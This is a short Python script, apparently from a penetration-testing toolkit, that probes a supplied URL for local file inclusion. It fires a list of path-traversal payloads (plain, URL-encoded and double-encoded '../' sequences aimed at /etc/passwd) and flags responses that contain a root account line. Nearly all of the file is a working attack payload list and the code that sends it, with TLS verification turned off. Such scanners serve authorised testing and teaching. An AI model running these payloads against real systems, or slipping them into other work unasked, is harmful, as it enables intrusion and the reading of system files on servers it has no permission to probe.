PentestPilot/bin/web/lfi_tester.py

#!/usr/bin/env python3
import sys, re, requests

PAYLOADS = [
    '/etc/passwd',
    '../../etc/passwd',
    '../../../etc/passwd',
    '../../../../etc/passwd',
    '../../../../../../etc/passwd',
    '..%2f..%2f..%2f..%2fetc%2fpasswd',
    '....//....//....//....//etc//passwd',
    '..%252f..%252f..%252f..%252fetc%252fpasswd',
]

def usage():
    print(f"Usage: {sys.argv[0]} <url-with-PLACEHOLDER>")
    print("  e.g. http://10.10.10.10/vuln.php?file=PLACEHOLDER")
    sys.exit(1)

if len(sys.argv) < 2:
    usage()

url = sys.argv[1]
if 'PLACEHOLDER' not in url:
    print('[!] URL must contain PLACEHOLDER token')
    sys.exit(1)

for p in PAYLOADS:
    u = url.replace('PLACEHOLDER', p)
    try:
        r = requests.get(u, timeout=8, verify=False, allow_redirects=True)
        hit = bool(re.search(r'root:.*:0:0:', r.text))
        print(f"[{'+' if hit else '-'}] {p} -> {r.status_code} len={len(r.content)}")
        if hit:
            print('    Potential LFI! Found \'root:\' pattern.')
    except Exception as e:
        print(f"[!] {p} -> error: {e}")